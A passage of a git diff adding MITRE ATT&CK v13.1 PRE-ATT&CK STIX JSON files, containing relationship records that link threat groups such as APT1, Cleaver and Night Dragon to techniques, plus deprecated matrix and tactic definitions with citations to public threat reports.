b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--3a2c2458-0e54-4d17-8b8d-ddd5045b6af3", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used third party hosting services in the U.S. in an attempt to hide their operations.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "type": "relationship", + "modified": "2019-03-25T14:36:29.820Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d26a1746-b577-4a89-be5e-c49611e8c65a.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d26a1746-b577-4a89-be5e-c49611e8c65a.json new file mode 100644 index 0000000000000000000000000000000000000000..8804472ab3eff991198883237df1c78cc9d8e4d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d26a1746-b577-4a89-be5e-c49611e8c65a.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--72ac893c-7742-44c3-b102-5e6f4d0fbe21", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--d26a1746-b577-4a89-be5e-c49611e8c65a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) fake personas included profile photos, details, and network connections.(Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "type": "relationship", + "modified": "2019-03-22T20:00:23.896Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb.json new file mode 100644 index 0000000000000000000000000000000000000000..898a93ad6f5e2c716e158162f2789d053d4dd406 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a5919784-3675-42c9-b967-62259246e710", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db10491f-a854-4404-9271-600349484bc3.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db10491f-a854-4404-9271-600349484bc3.json new file mode 100644 index 0000000000000000000000000000000000000000..9869c0c3a05c1a221abd5ec38baa0b3e4910d5c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db10491f-a854-4404-9271-600349484bc3.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--19e1e9e3-db4e-4db6-aff5-44a1e6245f82", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--db10491f-a854-4404-9271-600349484bc3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points. Mandiant considers them to be \u201chijacked\u201d since they were originally registered for a legitimate reason but are used by APT1 for malicious purposes.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--aadaee0d-794c-4642-8293-7ec22a99fb1a", + "type": "relationship", + "modified": "2019-08-20T13:08:13.223Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da.json new file mode 100644 index 0000000000000000000000000000000000000000..03912541d6aca39458bed9db4615905e61366f3d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ee758073-8fc1-4312-8988-3b0da422b9c0", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "relationship_type": "related-to", + "target_ref": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--e4501560-7850-4467-8422-2cf336429e8a.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--e4501560-7850-4467-8422-2cf336429e8a.json new file mode 100644 index 0000000000000000000000000000000000000000..2f0b638cea2dd845ea20a6bd6ca4b1fbb7f979e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--e4501560-7850-4467-8422-2cf336429e8a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c5a69776-ff29-46ab-9a80-db7d36cc1fb2", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--e4501560-7850-4467-8422-2cf336429e8a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f", + "relationship_type": "related-to", + "target_ref": "attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ef32147c-d309-4867-aaba-998088290e32.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ef32147c-d309-4867-aaba-998088290e32.json new file mode 100644 index 0000000000000000000000000000000000000000..f983635d112c344849cef382524030d85a17b610 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ef32147c-d309-4867-aaba-998088290e32.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d6ec5464-84a3-4d38-a352-3cefeeb2e989", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--ef32147c-d309-4867-aaba-998088290e32", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407", + "relationship_type": "related-to", + "target_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd.json new file mode 100644 index 0000000000000000000000000000000000000000..98f680ec447a03f887a152149b6432b800753c56 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1e9fc7fa-29cf-434a-a6b4-01de14188be4", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--f24a6bf4-c60f-4fa6-8f6a-f2806ae92cdd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f43faad4-a016-4da0-8de6-53103d429268.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f43faad4-a016-4da0-8de6-53103d429268.json new file mode 100644 index 0000000000000000000000000000000000000000..c39e53e11c024bcd375a396faada2c61e91df08d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f43faad4-a016-4da0-8de6-53103d429268.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--63a866d4-0193-43cc-aa32-8da9f5238cf9", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--f43faad4-a016-4da0-8de6-53103d429268", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has used zhCat to encrypt traffic or use inline obfuscation to make detection more difficult. zhCat makes message traffic look benign.(Citation: Cylance Cleaver)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--c2ffd229-11bb-4fd8-9208-edbe97b14c93", + "type": "relationship", + "modified": "2019-03-22T20:00:23.837Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29.json new file mode 100644 index 0000000000000000000000000000000000000000..21eb9182a8528e960206ed531986cff5d1b0bf7f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--be101af8-2f2d-494d-bcf6-2063028e0610", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--f8504a07-758c-4c51-ac94-c2e7ba652e29", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be.json new file mode 100644 index 0000000000000000000000000000000000000000..c99eb1c16ee2d01fd5cd0ca62ec78af0fea33be4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--83b77644-5963-42a0-bb94-9ae2718b71a3", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--f8559304-7ef6-4c48-8d76-a56ebf37c0be", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT16](https://attack.mitre.org/groups/G0023) has compromised otherwise legitimate sites as staging servers for second-stage payloads.(Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "source_name": "FireEye EPS Awakens Part 2" + } + ], + "source_ref": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "relationship_type": "uses", + "target_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b", + "type": "relationship", + "modified": "2019-03-22T14:20:45.685Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-matrix/x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-matrix/x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d.json new file mode 100644 index 0000000000000000000000000000000000000000..eec74a3a703c85067bf75f599465ffff1ac1eb87 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-matrix/x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--f64ee064-53df-4d43-9599-6d18cca8612d", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-matrix--2e2c97c3-1908-4e2d-a711-a27d3859eb1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "PRE-ATT&CK", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/matrices/pre/).\n\nBelow are the tactics and techniques representing the MITRE PRE-ATT&CK Matrix.", + "external_references": [ + { + "external_id": "pre-attack", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/matrices/pre" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "tactic_refs": [ + "x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940", + "x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd", + "x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6", + "x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b", + "x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb", + "x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24", + "x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec", + "x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b", + "x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b", + "x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8", + "x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c", + "x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e", + "x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266", + "x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2", + "x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607" + ], + "modified": "2020-10-22T15:43:48.844Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b.json new file mode 100644 index 0000000000000000000000000000000000000000..af594c237fef9d9f8fef6c9a2207594b8bc77e58 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--8731f0a7-9257-493a-bb36-e628e0bc7ba6", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--0abac415-7b49-4085-93b3-662ba1258b4b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Technical Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0015/).\n\nTechnical information gathering consists of the process of identifying critical technical elements of intelligence an adversary will need about a target in order to best attack.\u00a0 Technical intelligence gathering includes, but is not limited to, understanding the target's network architecture, IP space, network services, email format, and security procedures.", + "external_references": [ + { + "external_id": "TA0015", + "url": "https://attack.mitre.org/tactics/TA0015", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "technical-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:33:53.838Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd.json new file mode 100644 index 0000000000000000000000000000000000000000..759fe2d89b42b47e7f805748bfdeab05ee545b40 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--ff3a0b13-25df-4240-a889-17c67c32fd24", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--0f0ff9a7-3c8d-4af6-8e45-f6d359553ffd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Priority Definition Direction", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0013/).\n\nPriority definition direction consists of the process of collecting and assigning requirements for meeting Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) as determined by leadership.", + "external_references": [ + { + "external_id": "TA0013", + "url": "https://attack.mitre.org/tactics/TA0013", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "priority-definition-direction", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:32:47.554Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c.json new file mode 100644 index 0000000000000000000000000000000000000000..8d1f8b87a8b89863f3ec80eb6dc852b271f1266e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--024a0c80-47a5-4b79-b113-e5aec2deb413", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Establish & Maintain Infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0022/).\n\nEstablishing and maintaining infrastructure consists of building, purchasing, co-opting, and maintaining systems and services used to conduct cyber operations. An adversary will need to establish infrastructure used to communicate with and control assets used throughout the course of their operations.", + "external_references": [ + { + "external_id": "TA0022", + "url": "https://attack.mitre.org/tactics/TA0022", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "establish-&-maintain-infrastructure", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:37:16.235Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8.json new file mode 100644 index 0000000000000000000000000000000000000000..ebc5a1ed15b944fd24ba7d2cb3ab0b17662d4c82 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--a89005e4-f054-4029-870a-48de202cc7da", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Adversary OPSEC", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0021/).\n\nAdversary OPSEC consists of the use of various technologies or 3rd party services to obfuscate, hide, or blend in with accepted network traffic or system behavior. The adversary may use these techniques to evade defenses, reduce attribution, minimize discovery, and/or increase the time and effort required to analyze.", + "external_references": [ + { + "external_id": "TA0021", + "url": "https://attack.mitre.org/tactics/TA0021", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "adversary-opsec", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:36:37.579Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6.json new file mode 100644 index 0000000000000000000000000000000000000000..a153075281d09ff2f19ddb6fc3f491162d1d1174 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--3e18b777-3d83-448b-aeaf-32f2994adb81", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Target Selection", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0014/).\n\nTarget selection consists of an iterative process in which an adversary determines a target by first beginning at the strategic level and then narrowing down operationally and tactically until a specific target is chosen.\u00a0 A target may be defined as an entity or object that performs a function considered for possible engagement or other action.", + "external_references": [ + { + "external_id": "TA0014", + "url": "https://attack.mitre.org/tactics/TA0014", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "target-selection", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:33:25.361Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec.json new file mode 100644 index 0000000000000000000000000000000000000000..6afb9e4c1a3262653c90310c7a7a56a5e09ea93e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--4abb5206-a01e-42f1-b77d-56ba4b60add7", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Technical Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0018/).\n\nTechnical weakness identification consists of identifying and analyzing weaknesses and vulnerabilities collected during the intelligence gathering phases to determine best approach based on technical complexity and adversary priorities (e.g., expediency, stealthiness).", + "external_references": [ + { + "external_id": "TA0018", + "url": "https://attack.mitre.org/tactics/TA0018", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "technical-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:35:24.309Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940.json new file mode 100644 index 0000000000000000000000000000000000000000..47ef18cce70f2e52e42ba8f71005457c8cb7d357 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--2998b7c9-4fcd-44c8-881c-0ba309f4c993", + "spec_version": "2.0", + "objects": [ + { + "id": 